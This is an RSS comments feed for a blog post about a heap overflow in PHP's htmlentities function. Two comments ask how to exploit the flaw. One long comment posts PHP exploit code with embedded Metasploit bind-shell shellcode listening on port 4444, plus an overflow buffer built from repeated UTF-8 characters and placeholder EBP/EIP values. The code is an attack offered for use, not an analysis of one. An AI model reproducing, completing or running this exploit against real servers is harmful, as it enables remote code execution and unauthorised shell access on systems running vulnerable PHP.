<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
  <title>PoC &#47; Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability &#45; Crash&#47;DoS&#63; - Yorumlar</title>
  <description>Ferruh Mavituna - Me, Myself and My Alter Ego...</description>
  <copyright>Ferruh Mavituna</copyright>
  <link>http://ferruh.mavituna.com</link>
  <lastBuildDate>Paz, 12 Şub 2012 19:39:27 +0200</lastBuildDate>
  <image>
    <title>Ferruh Mavituna</title>
    <link>http://ferruh.mavituna.com</link>
    <url>http://ferruh.mavituna.com/rss/rss.gif</url>
  </image>
  <item>
  <title>isooo</title>
  <link>http://ferruh.mavituna.com/poc-exploit-for-php-html-entity-encoder-heap-overflow-vulnerability-crash-dos-oku/</link>
  <author>isooo</author>
  <pubDate>Cmt, 14 Mar 2009 15:27:43 +0200</pubDate>
  <description>           Bu acikdan nasil faydalaniliniyor onuda anlatirmisini bi zahmet?</description>
</item>
<item>
  <title>Tr4c3</title>
  <link>http://ferruh.mavituna.com/poc-exploit-for-php-html-entity-encoder-heap-overflow-vulnerability-crash-dos-oku/</link>
  <author>Tr4c3</author>
  <pubDate>Sal, 26 Ara 2006 10:05:22 +0200</pubDate>
  <description>           May you sent the EXP for PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability  to me,Please&lt;br /&gt;THX in advance.Lol</description>
</item>
<item>
  <title>Tontonq</title>
  <link>http://ferruh.mavituna.com/poc-exploit-for-php-html-entity-encoder-heap-overflow-vulnerability-crash-dos-oku/</link>
  <author>Tontonq</author>
  <pubDate>Cum, 01 Ara 2006 19:48:55 +0200</pubDate>
  <description>           &amp;lt;?&lt;br /&gt;$fuzzFixed=&amp;quot;A&amp;quot;;&lt;br /&gt;#/* linux_ia32_bind -  LPORT=4444 Size=108 Encoder=PexFnstenvSub&lt;a href=&quot;http://metasploit.com&quot;&gt;http://metasploit.com&lt;/a&gt; */&lt;br /&gt;$shellcode =&lt;br /&gt;&amp;quot;\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64&amp;quot;&lt;br /&gt;&amp;quot;\xb4\xc7\x69\x83\xeb\xfc\xe2\xf4\x55\x6f\x94\x2a\x37\xde\xc5\x03&amp;quot;&lt;br /&gt;&amp;quot;\x02\xec\x5e\xe0\x85\x79\x47\xff\x27\xe6\xa1\x01\x75\xe8\xa1\x3a&amp;quot;&lt;br /&gt;&amp;quot;\xed\x55\xad\x0f\x3c\xe4\x96\x3f\xed\x55\x0a\xe9\xd4\xd2\x16\x8a&amp;quot;&lt;br /&gt;&amp;quot;\xa9\x34\x95\x3b\x32\xf7\x4e\x88\xd4\xd2\x0a\xe9\xf7\xde\xc5\x30&amp;quot;&lt;br /&gt;&amp;quot;\xd4\x8b\x0a\xe9\x2d\xcd\x3e\xd9\x6f\xe6\xaf\x46\x4b\xc7\xaf\x01&amp;quot;&lt;br /&gt;&amp;quot;\x4b\xd6\xae\x07\xed\x57\x95\x3a\xed\x55\x0a\xe9&amp;quot;;&lt;br /&gt;&lt;br /&gt;echo &amp;quot;hmm&amp;quot;;&lt;br /&gt;&lt;br /&gt;for($pl=0; $pl&amp;lt;63; $pl++)&lt;br /&gt;$fuzzFixed .= code2utf(977);&lt;br /&gt;if($pl == &amp;quot;63&amp;quot;) { &lt;br /&gt;$fuzzFixed .= &amp;quot;BBBB&amp;quot;; #jump to ebp&lt;br /&gt;$fuzzFixed .= &amp;quot;CCCC&amp;quot;; #ahh eip&lt;br /&gt;$fuzzFixed .= &amp;quot;$shellcode&amp;quot;;&lt;br /&gt; }&lt;br /&gt;htmlentities($fuzzFixed , ENT_NOQUOTES, &amp;quot;utf-8&amp;quot; );&lt;br /&gt;&lt;br /&gt;function code2utf($num){&lt;br /&gt;return chr(($num&amp;gt;&amp;gt;6)+192).chr(($num&amp;amp;63)+128);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;echo &amp;quot;ehm...&amp;quot;;&lt;br /&gt;?&amp;gt;&lt;br /&gt;</description>
</item>

</channel>
</rss>
